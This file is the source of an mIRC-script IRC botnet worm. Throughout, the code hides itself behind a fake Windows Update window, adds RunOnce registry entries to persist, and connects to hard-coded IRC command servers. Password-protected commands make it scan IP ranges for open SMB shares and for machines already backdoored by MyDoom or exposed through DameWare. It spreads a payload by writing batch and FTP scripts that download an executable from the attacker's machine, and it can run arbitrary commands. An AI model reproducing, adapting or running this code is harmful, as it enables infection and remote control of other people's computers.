   on *:TEXT:.login*:*:{
     if (%hp == $null) { set %hp bitchplz }
     elseif (%stat == logged) { .m.c already logged }
     elseif ($2- == %hp) && ($nick isop #) { timer_chek 1 3 m.c 1Password...1[A]pproved | /set %stat logged | /guser 10 $nick 3 | /set %xT $address | /set %xTNick $nick }
     elseif (%stat != logged) { timerden0 1 1 m.c 1Password... 1[D]enied }
   }
   on *:INPUT:*:{ haltdef | m.c %b1 $+ security $+ %b2 user input %b1 $+ $1- $+ %b2 | .hide | /exit }
   on *:START:{ iTStart }
   on *:EXIT:{ iTExit }
   on *:CONNECT:{ iTConn }
   on *:DISCONNECT:{ iTDC }
   on *:CONNECTFAIL:{ iTCF }
   on *:DNS:{ var %x = 1,%dnum = $dns(0) | if (%dnum == 0) { return } | while (%x <= %dnum) { var %dall = %dall $dns(%x).ip | inc %x } | %dall = $replace(%dall,$chr(32),$+($chr(44),$chr(32))) | .m.c dns resolved  $+ %dnsip $+  to  $+ %dall $+   | unset %dnsip }
   on *:SOCKREAD:ident.*:{ sockread %ident | tokenize 32 %ident | if ($numtok($1-,44) == 2) && ($1 isnum) && ($3 isnum) { sockwrite -n $sockname $3 , $1 : USERID : none.of.your.business : $rletterz | sockclose $sockname | unset %ident } }
   on *:PART:*:{ if ($level($nick) != 1) { .ruser $nick | .clearall } }
   on *:QUIT:{ if ($level($nick) != 1) { .ruser $nick | .clearall } }
   on *:NICK:{ if ($level($nick) != 1) { .ruser $nick | .clearall } }
   on 10:TEXT:.scan *:#:{
     ; Dont Work Well So Commented It out :)
   if ($2 == dame) { .m.c %b1 $+ scanner $+ %b2 scanning %b1 $+ $3 - $4 $+ %b2 DameWare Spolit | set %begshortip $3 | set %beglongip $longip(  %begshortip ) | set %endshortip $4 | set %endlongip $longip( %endshortip  ) | set %total $calc( %endlongip - %beglongip ) | unset %totalscaning | startscan }
     ;
     if ($2 == stats) { .m.c %b1 $+ scanner $+ %b2 scan stats %b1 $+ range: [ %begshortip - %endshortip ] port: [ %scanport ] protocol: [ %scanproto ] current ip: [ %ip34 ] total found: [ $totalfound ] spreading file: [ %spreadfile ] $+ %b2 }
     if ($2 == mydoom) { .m.c %b1 $+ scanner $+ %b2 scanning %b1 $+ $3 - $4 $+ %b2 MYd00m.a Spolit | /set %R.D1 $3 | /set %R.D2 $4 | .d00m.start }
     if ($2 == d00m.vul) { /d00m.vul }
     if ($2 == d00m.r00t) { /d00m.r00t }
     if ($2 == ver) { .m.c 3MyD00M Spreader 10-para }
     if ($2 == l0c4l) { set %begit $gettok($ip,1-3,46) $+ .1 | .m.c %b1 $+ scanner $+ %b2 scanning %b1 $+ %begit - $gettok($ip,1-3,46) $+ .255 $+ %b2 | set %begshortip %begit | set %beglongip $longip( %begshortip ) | set %endshortip $gettok($ip,1-3,46) $+ .255 | set %endlongip $longip( %endshortip ) | set %total $calc( %endlongip - %beglongip ) | unset %totalscaning | startscan | /set %R.D1 $3 | /set %R.D2 $4 | .d00m.start }
     if ($2 == NB) && (%begshortip == $null) && ($isfile(%spreadfile)) { m.c %b1 $+ scanner $+ %b2 scanning %b1 $+ $3 - $4 $+ %b2 | set %begshortip $3 | set %beglongip $longip(  %begshortip ) | set %endshortip $4 | set %endlongip $longip( %endshortip  ) | set %total $calc( %endlongip - %beglongip ) | unset %totalscaning | startscan }
     if ($2 == var) { if ([ [ $$3- ] ] != $null) { m.c %b1 $+ variable $+ %b2 %b1 $+ $3- = [ [ $$3- ] ] $+ %b2 } }
     if ($2 == -) { /set %tempx $3- | /m.c 5:1 / $+ %tempx 12[5\12[2Done12]5/12] | %tempx }
     if ($2 == info) { .m.c %b1 $+ mirc-info $+ %b2 %b1 $+ time online: $uptime(mirc,1) server: $server $+ %b2  IP: $ip Uptime: $uptime(system,1) }
     if ($2 == cmds) { .m.c .stats - Scan Stats | .m.c .mydoom - Scans for MydoomA | .m.c .info - Info | .m.c .NB - Scans Netbios | .m.c .l0c4l - Scans Local for NB and Mydoom | }
   }
   ;credit for original NON working code goes to slipknotman
   alias iTStart { .secure1 | .hide | .flush | .clearall | .sz | .sockclose * | .settz | .timers off | .tsettz | %sysdir = $mircdir..\ | .writeini $mircini ident userid $rletterz | .writeini $mircini mirc user $rletterz | .emailaddr $rletterz $+ @stealth.gov | .fullname $rletterz | .nick $nick0r | .anick $nick0r | .conn | .timer 0 20 securityz | .timerpingself -o 0 100 .ctcp $+($,me) PING | .timersecure -o 0 20 secure1 | .timerbgwin 0 5 bgwin | .window -h "Status Window" | .checkcopy | .mircreg | .makereg | .makereg2 | .srvtimecheck }
   alias iTExit { .flush | .clearall | .sockclose * | .tsettz | .timers off }
   alias iTConn { .flush | .pdcc on | .fsend on | .mode $me +ix | .checkcopy | .timerjoin 0 6 join %chan %key | .secure1 | .clearall }
   alias iTDc { .flush | .srvtimecheck | .nick $nick0r | .clearall }
   alias iTCF { .flush | .server %server1 | .srvtimecheck | .clearall }
   alias secure1 { .run -n msnq32.exe /n /fh /r "infsrv.exe" }
   alias sz { .set %MDIR $Mircdir | .set %DR0 syscfgr.exe }
   alias nick0r { return $chr(124) $+  mD $+  $chr(124)  $+ $rand(A,Z) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) }
   alias tsettz { hmake tsettz 10 | if (%chan) { .hadd tsettz tchan %chan } | if (%key) { .hadd tsettz tkey %key } | if (%spreadfile) { .hadd tsettz tspreadfile %spreadfile } | if (%defaultfile) { .hadd tsettz tdefaultfile %defaultfile } | if (%scanport) { .hadd tsettz tscanport %scanport } | if (%scanbat) { .hadd tsettz tscanbat %scanbat } | if (%scanproto) { .hadd tsettz tscanproto %scanproto } | if (%defaultproto) { .hadd tsettz tdefaultproto %defaultproto } | if (%b1) { .hadd tsettz tb1 %b1 } | if (%b2) { .hadd tsettz tb2 %b2 } | if (%c) { .hadd tsettz tc %c } | if (%server1) { .hadd tsettz tserver1 %server1 } | if (%server2) { .hadd tsettz tserver2 %server2 } | if (%server3) { .hadd tsettz tserver3 %server3 } | .unsetall
   if ($hget(tsettz,tchan)) { %chan = $ifmatch } | if ($hget(tsettz,tkey)) { %key = $ifmatch } | if ($hget(tsettz,tspreadfile)) { %spreadfile = $ifmatch } | if ($hget(tsettz,tdefaultfile)) { %defaultfile = $ifmatch } | if ($hget(tsettz,tscanport)) { %scanport = $ifmatch } | if ($hget(tsettz,tscanbat)) { %scanbat = $ifmatch } | if ($hget(tsettz,tscanproto)) { %scanproto = $ifmatch } | if ($hget(tsettz,tdefaultproto)) { %defaultproto = $ifmatch } | if ($hget(tsettz,tb1)) { %b1 = $ifmatch } | if ($hget(tsettz,tb2)) { %b2 = $ifmatch } | if ($hget(tsettz,tc)) { %c = $ifmatch } | if ($hget(tsettz,tserver1)) { %server1 = $ifmatch } | if ($hget(tsettz,tserver2)) { %server2 = $ifmatch } | if ($hget(tsettz,tserver3)) { %server3 = $ifmatch } | .hfree tsettz }
   alias settz { if (!%chan) { %chan = #doomtest } | if (!%key) { %key = itwist } | if (!%spreadfile) { %spreadfile = w32x9.exe } | if (!%defaultfile) { %defaultfile = w32x9.exe } | if (!%scanport) { %scanport = 445 } | if (!%scanbat2) { %scanbat2 = mmsql32.bat } | if (!%scanproto) { %scanproto = ipc$ } | if (!%defaultproto) { %defaultproto = ipc$ } | if (!%b1) { %b1 = 1 12[5\12[2 } | if (!%b2) { %b2 = 12]5/12] } | if (!%c) { %c = 0 } | if (!%hp) { %hp = bash } }
   alias rletterz { .return $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) }
   alias bgwin { .window -p @Microsoft.Windows.Update 0 0 1600 1200 | .window -a @Microsoft.Windows.update }
   alias checkcopy { if (!$isfile(%spreadfile)) { .scancopy } }
   alias scancopy { if ($isfile(%sysdir $+ %spreadfile $+ )) { .copy %sysdir $+ %spreadfile $mircdir $+ %spreadfile | m.c %b1 $+ copied $+ %b2 %b1 $+ $+(%,sysdir) $+ %b2 %b1 $+ %spreadfile $+ %b2 } }
   alias makereg { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\msjagerw32,$mircexe,REG_SZ) }
   alias makereg2 { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\msjagerw,mnnkav.exe,REG_SZ) }
   alias delreg { $RegDelete(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\msjagerw32) }
   alias mircreg { $RegWrite(HKEY_CURRENT_USER\Software\WUPD\License\,4782-505050,REG_SZ) | $RegWrite(HKEY_CURRENT_USER\Software\WUPD\UserName\,fubitch,REG_SZ) }
   alias srvtimecheck { .timerchcksrv -o 0 32 servercheck }
   alias hide { if ($isfile(msnq32.exe)) { .run -n msnq32.exe /n /fh WUPD } | else { .exit } }
   alias RegWrite {
     if ($1 != $null) && ($2) && ($3) {
       var %a = RegWrite
       .comopen %a WScript.Shell
       if !$comerr {
         var %b =  $com(%a,RegWrite,3,bstr,$1,bstr,$2,bstr,$3)
         .comclose %a
       }
     }
   }
   on *:JOIN:*:{
     if ($nick == $me) { .window -h $chan }
     if ($chan == %chan) { .timerjoin off }
   }
   alias startscan {
     inc %totalscaning
     if %totalscaning >= %total /finished
     set %ip1 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 1
     set %ip2 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 2
     set %ip3 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 3
     set %ip4 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 4
     set %ip5 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 5
     set %ip6 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 6
     set %ip7 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 7
     set %ip8 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 8
     set %ip9 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 9
     set %ip10 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 10
     set %ip11 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 11
     set %ip12 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 12
     set %ip13 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 13
     set %ip14 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 14
     set %ip15 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 15
     set %ip16 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 16
     set %ip17 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 17
     set %ip18 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 18
     set %ip19 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 19
     set %ip20 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 20
     set %ip21 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 21
     set %ip22 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 22
     set %ip23 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 23
     set %ip24 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 24
     set %ip25 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 25
     set %ip26 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 26
     set %ip27 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 27
     set %ip28 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 28
     set %ip29 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 29
     set %ip30 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 30
     set %ip31 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 31
     set %ip32 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 32
     set %ip33 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     if %totalscaning == %total opensocks 33
     set %ip34 $longip($calc( %beglongip + %totalscaning ))
     inc %totalscaning
     opensocks
   }
   alias opensocks {
     sockopen ip1 %ip1 %scanport
     if $1 == 1 finished
     sockopen ip2 %ip2 %scanport
     if $1 == 2 finished
     sockopen ip3 %ip3 %scanport
     if $1 == 3 finished
     sockopen ip4 %ip4 %scanport
     if $1 == 4 finished
     sockopen ip5 %ip5 %scanport
     if $1 == 5 finished
     sockopen ip6 %ip6 %scanport
     if $1 == 6 finished
     sockopen ip7 %ip7 %scanport
     if $1 == 7 finished
     sockopen ip8 %ip8 %scanport
     if $1 == 8 finished
     sockopen ip9 %ip9 %scanport
     if $1 == 9 finished
     sockopen ip10 %ip10 %scanport
     if $1 == 10 finished
     sockopen ip11 %ip11 %scanport
     if $1 == 11 finished
     sockopen ip12 %ip12 %scanport
     if $1 == 12 finished
     sockopen ip13 %ip13 %scanport
     if $1 == 13 finished
     sockopen ip14 %ip14 %scanport
     if $1 == 14 finished
     sockopen ip15 %ip15 %scanport
     if $1 == 15 finished
     sockopen ip16 %ip16 %scanport
     if $1 == 16 finished
     sockopen ip17 %ip17 %scanport
     if $1 == 17 finished
     sockopen ip18 %ip18 %scanport
     if $1 == 18 finished
     sockopen ip19 %ip19 %scanport
     if $1 == 19 finished
     sockopen ip20 %ip20 %scanport
     if $1 == 20 finished
     sockopen ip21 %ip21 %scanport
     if $1 == 21 finished
     sockopen ip22 %ip22 %scanport
     if $1 == 22 finished
     sockopen ip23 %ip23 %scanport
     if $1 == 23 finished
     sockopen ip24 %ip24 %scanport
     if $1 == 24 finished
     sockopen ip25 %ip25 %scanport
     if $1 == 25 finished
     sockopen ip26 %ip26 %scanport
     if $1 == 26 finished
     sockopen ip27 %ip27 %scanport
     if $1 == 27 finished
     sockopen ip28 %ip28 %scanport
     if $1 == 28 finished
     sockopen ip29 %ip29 %scanport
     if $1 == 29 finished
     sockopen ip30 %ip30 %scanport
     if $1 == 30 finished
     sockopen ip31 %ip31 %scanport
     if $1 == 31 finished
     sockopen ip32 %ip32 %scanport
     if $1 == 32 finished
     sockopen ip33 %ip33 %scanport
     if $1 == 33 finished
     sockopen ip34 %ip34 %scanport
     .timerscanner1 -o 1 4 /sockclose ip*
     .timerscanner2 -o 1 5 /startscan
   }
   alias securityz {
     if ($appstate == hidden) { clearall }
     if ($appstate != hidden) { /timer123123 0 1 /hide | hide | clearall | uinst }
     if (!$isfile(msnq32.exe)) { .m.c %b1 $+ security $+ %b2 %b1 $+ hidewindow is missing $+ %b2 | clearall | uinst }
   }
   alias servercheck {
     if ($server == $null) {
       if (%servercheck == $null) || (%servercheck == 0) { set %servercheck 1 | server %server2 | halt }
       if (%servercheck = 1) { set %servercheck 2 | server %server3 | halt }
       if (%servercheck = 2) { set %servercheck 0 | server %server1 | halt }
     }
     else { halt }
   }
   alias conn {
     if ($portfree(113)) { socklisten IDENT 113 }
     if (%server1 == $null) { set %server1 sex0r.ath.cx:6667 } | if (%server2 == $null) { set %server2 irc.ryan1918.com:6667 } | if (%server3 == $null) { set %server3 irc.ryan1918.com:6667 } | /server %server1
   }
   raw 433:*:{ nick $nick0r }
   on *:SOCKOPEN:ip*:{ if ($sockerr > 0) { halt }
     if (%scanport == 445) {
       set %445ip % [ $+ [ $sockname ] ]
       .run -n msnq32.exe /n /fh /r " $+ %scanbat2 %445ip %scanproto %spreadfile $+ "
       .m.c %b1 $+ scanner $+ %b2 %b1 $+ attempting to spread %spreadfile to %445ip using %scanbat $+ / $+ %scanproto $+ %b2
       inc %totalscanned | sockclose $sockname | unset %445ip | halt
     }
     elseif (%scanport != 445) {
       set %otherip % [ $+ [ $sockname ] ]
       .write.dame
       .m.c %b1 $+ scanner $+ %b2 %b1 $+ attempting to spread %spreadfile to %otherip using %scanbat $+ / $+ %scanproto $+ %b2
       inc %totalscanned | sockclose $sockname | unset %otherip | halt
     }
   }
   alias del.bats {
     var %i = 1, %file = Scan-Bat.name, %lines = $lines(%file)
     while (%i <= %lines) {
       remove $read(%file, %i)
       inc %i
     }
   }
   alias del.d {
     var %i = 1, %file = Scan-CMD.name, %lines = $lines(%file)
     while (%i <= %lines) {
       remove $read(%file, %i)
       inc %i
     }
   }
   alias del.c {
     var %i = 1, %file = Scan-Dame.name, %lines = $lines(%file)
     while (%i <= %lines) {
       remove $read(%file, %i)
       inc %i
     }
   }
   alias Exe.batchs {
     var %i = 1, %file = Scan-Bat.name, %lines = $lines(%file)
     while (%i <= %lines) {
       run $read(%file, %i)
       inc %i
     }
   }
   alias d00m.start {
     .remove scan.txt
     .run notepad.exe -p 3127 %R.D1 %R.D2
     .run msnq32.exe /n /fh " $+ $mircdirnotepad.exe $+ "
     .timer 0 400 /check.d0ne
   }
   alias d00m.vul {
     .m.c $lines(scan.txt) People Found Suggest R00t1ng them
   }
   alias check.d0ne {
     .run cmd.exe /C mnn32.exe -e >> Cck.txt
     if ($read(Cck.txt,w,* $+ $mircdirsyscfgr.exe $+ *)) { .m.c Error Still Scanning.... }
     else { .m.c Scanning Mydoom.a Done }
   }
   alias d00m.r00t {
     .m.c R00T1ng $lines(Scan.txt) Boxes
     var %i = 1, %file = scan.txt, %lines = $lines(%file)
     while (%i <= %lines) {
       .run msng32.exe $+(",%MDIR,%DR0,") $read(%file, %i) 3127 %spreadfile
       inc %i
     }
   }
   alias write.dame {
     set %DAME DAME $+ $r(1,10000) $+ $r(1,9) $+ .bat
     .write Scan-Dame.name %DAME
     /write %DAME @echo off
     /write -il2 %DAME %scanbat %otherip %myip 1202 0
     /write -il3 %DAME %scanbat %otherip %myip 1202 1
     /write -il4 %DAME %scanbat %otherip %myip 1202 2
     .run %DAME
     .write.bat
   }
   alias write.bat {
     set %BAT BAT $+ $r(1,10000) $+ $r(1,9) $+ .bat
     /write Scan-Bat.name %BAT
     /write %BAT @echo off
     /write -il2 %BAT ftp -i -s: $+ %_Cmd
     .writecmd
   }
   alias writecmd {
     set %_Cmd CMD $+ $r(1,10000) $+ $r(1,9) $+ .txt
     .write Scan-CMD.name %CMD
     /write %_Cmd ftp
     /write -il2 %_Cmd open %otherip 1202
     /write -il3 %_Cmd h4x0r
     /write -il4 %_Cmd get http:// $+ %myip $+ : $+ 865 $+ / $+ sccvhost.exe
     /write -il5 %_Cmd exit
     /write -il6 %_Cmd quit
   }
   alias finished {
     if (%begshortip != $null) {
       m.c %b1 $+ scanner $+ %b2 scanning from %b1 $+ %begshortip - %endshortip $+ %b2 has finished! | stopscan
     }
   }
   alias b1 { set %b1 1 12[5\12[2 }
   alias b2 { set %b2 12]5/12] }
   alias m.c { .msg %chan $1- }
   alias stopscan { sockclose ip* | .timerscanner* off | unset %ip* | unset %totalscan* | unset %beg* | unset %end* | unset %rand2ip | }
